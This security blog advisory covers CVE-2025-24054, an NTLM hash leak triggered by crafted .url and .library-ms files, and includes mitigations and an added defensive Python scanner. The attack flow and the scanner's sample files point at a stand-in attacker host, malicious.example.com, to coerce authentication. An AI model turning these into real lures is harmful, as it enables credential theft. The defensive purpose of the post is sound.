CYB3R53C


CVE-2025-24054 Under Active Attack – New Exploit Steals NTLM Hashes on File Download

A newly disclosed Windows vulnerability, tracked as CVE-2025-24054, is currently being exploited in the wild, allowing attackers to harvest NTLM authentication hashes simply by tricking users into downloading malicious files. The flaw is particularly dangerous because it requires no user interaction beyond initiating a file download.

What Is CVE-2025-24054?

CVE-2025-24054 is a low-complexity vulnerability discovered in how Windows handles certain file download requests. Specifically, it affects applications that automatically fetch metadata or preview remote files upon download. Exploitation occurs when a remote server is able to coerce the client system into initiating NTLM authentication—a legacy Windows protocol prone to hash relay and cracking.

Attackers can exploit this by crafting a link to a file (e.g., .url, .library-ms, or .search-ms) hosted on a remote SMB or WebDAV share under their control. Once the file is downloaded, Windows may attempt an automatic NTLM authentication to the malicious server—leaking NTLMv2 hashes without the user knowing.

This is a textbook example of an NTLM credential-leak vulnerability, and it follows in the footsteps of past flaws like CVE-2023-23397, which was abused via Outlook calendar invites.

Real-World Exploitation Confirmed

Security researchers have already observed real-world exploitation of CVE-2025-24054 in the wild. Attackers are distributing malicious .url and .library-ms files through phishing emails and cloud storage links. Once the user initiates the download—especially via Microsoft Outlook or Microsoft Teams—the file triggers a silent outbound NTLM authentication to the attacker’s server.

These NTLMv2 hashes can then be:

  • Cracked offline using tools like Hashcat or John the Ripper
  • Used in pass-the-hash attacks to impersonate the victim
  • Relayed to internal systems in real-time to escalate privileges

According to telemetry data from several threat intel firms, exploitation has been observed targeting government, finance, and manufacturing sectors—suggesting APT-level actors may already be leveraging this vulnerability in advanced campaigns.

Technical Mechanics of the Attack

Here’s a simplified flow of how the CVE-2025-24054 exploit works:

  1. Attacker crafts a file (e.g., .url) pointing to a remote UNC path like \\malicious.example.com\file.url
  2. Victim downloads or previews the file (via email, web link, or Teams message)
  3. Windows attempts to resolve the UNC path
  4. Windows automatically authenticates via NTLM (if allowed by policy)
  5. The NTLM hash is sent to the attacker’s server
  6. Attacker harvests or cracks the credentials

What makes this even more concerning is that the Windows Preview Pane and certain background services may trigger the authentication without any user interaction, depending on system configuration.

Affected Systems

While Microsoft has not yet released a detailed advisory, initial indicators suggest the following are vulnerable:

  • Windows 10, 11, and Server editions (especially default configurations)
  • Systems with NTLM enabled and outbound SMB/WebDAV allowed
  • Clients using Outlook, Teams, or browser-based collaboration tools
  • Any endpoint that doesn’t restrict NTLM to specific trusted hosts

Mitigation & Recommendations

Until Microsoft issues an official patch, organizations are urged to adopt the following mitigations:

1. Block Outbound NTLM

Configure Group Policy to block outbound NTLM traffic except to approved servers:

Computer Configuration → Administrative Templates → System → Net Logon → Restrict NTLM: Outgoing NTLM traffic to remote servers

2. Disable NTLM Where Possible

Organizations should begin phasing out NTLM in favor of Kerberos or certificate-based authentication.

3. Filter or Block Suspicious File Types

Use endpoint protection to detect or block .url, .library-ms, and .search-ms files from untrusted sources.
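As an added, defender-side example that is not part of the original post: a small Python scanner that pulls out the UNC and file:// hosts a .url or .library-ms file would make Windows contact and flags any that are not on an allowlist. The allowlist (TRUSTED_HOSTS), the sample files and the hostnames in them are constructed for illustration.

```python
"""Flag .url / .library-ms files that point Windows at untrusted remote hosts."""
import re
import xml.etree.ElementTree as ET
from typing import List

# Hosts the organisation legitimately reaches over SMB/WebDAV (assumed allowlist).
TRUSTED_HOSTS = {"fileserver.corp.local"}

# Captures the host from \\host\share and file://host/share style references.
_UNC_RE = re.compile(r"(?:\\\\|file:/{2,3})([A-Za-z0-9.\-_]+)[\\/]", re.IGNORECASE)
# .url keys whose value Windows resolves (and may authenticate to) on its own.
_INI_KEYS = ("url", "iconfile", "workingdirectory")


def unc_hosts_in_url_file(text: str) -> List[str]:
    """Hosts referenced by URL=/IconFile=/WorkingDirectory= lines of a .url file."""
    hosts: List[str] = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() in _INI_KEYS:
            hosts += _UNC_RE.findall(value.strip())
    return hosts


def unc_hosts_in_library_ms(text: str) -> List[str]:
    """Hosts referenced by <url> elements anywhere in a .library-ms XML document."""
    hosts: List[str] = []
    for el in ET.fromstring(text).iter():
        if el.tag.rsplit("}", 1)[-1] == "url" and el.text:  # strip XML namespace
            hosts += _UNC_RE.findall(el.text.strip())
    return hosts


def suspicious_hosts(filename: str, text: str) -> List[str]:
    """Hosts the file would coerce the client to contact that are not allowlisted."""
    name = filename.lower()
    if name.endswith(".url"):
        hosts = unc_hosts_in_url_file(text)
    elif name.endswith(".library-ms"):
        hosts = unc_hosts_in_library_ms(text)
    else:
        return []
    return sorted({h.lower() for h in hosts if h.lower() not in TRUSTED_HOSTS})


# Constructed samples: a shortcut and a library file pointing at an external host.
SAMPLE_URL = ("[InternetShortcut]\nURL=file://malicious.example.com/share/doc.pdf\n"
              "IconFile=\\\\malicious.example.com\\share\\icon.ico\nIconIndex=1\n")
SAMPLE_LIBRARY = ('<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
                  "<searchConnectorDescriptionList><searchConnectorDescription><simpleLocation>"
                  "<url>\\\\fileserver.corp.local\\docs</url></simpleLocation></searchConnectorDescription>"
                  "<searchConnectorDescription><simpleLocation><url>\\\\malicious.example.com\\share</url>"
                  "</simpleLocation></searchConnectorDescription></searchConnectorDescriptionList>"
                  "</libraryDescription>")

if __name__ == "__main__":
    for fname, body in (("invite.url", SAMPLE_URL), ("docs.library-ms", SAMPLE_LIBRARY)):
        print(fname, "->", suspicious_hosts(fname, body))
```

Run over mail attachments or a download directory, a non-empty result is a file worth quarantining before the Preview Pane ever renders it.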

4. User Awareness

Educate users about the risks of opening unexpected file types—even if they look benign.

5. Monitor for NTLM Auth Attempts

Use tools like Sysmon, Splunk, or Microsoft Defender for Endpoint to detect and log unexpected NTLM traffic to the internet.

When Will a Patch Be Available?

Microsoft has not yet confirmed a patch release date, but given the active exploitation, a security update is likely to be included in the upcoming Patch Tuesday cycle. Until then, mitigation is your best defense.

Final Thoughts

CVE-2025-24054 highlights yet another abuse of legacy authentication mechanisms like NTLM, which continue to plague Windows environments despite years of hardening efforts. Organizations must act quickly to contain exposure and prevent potential lateral movement and data theft through NTLM-based credential leaks.
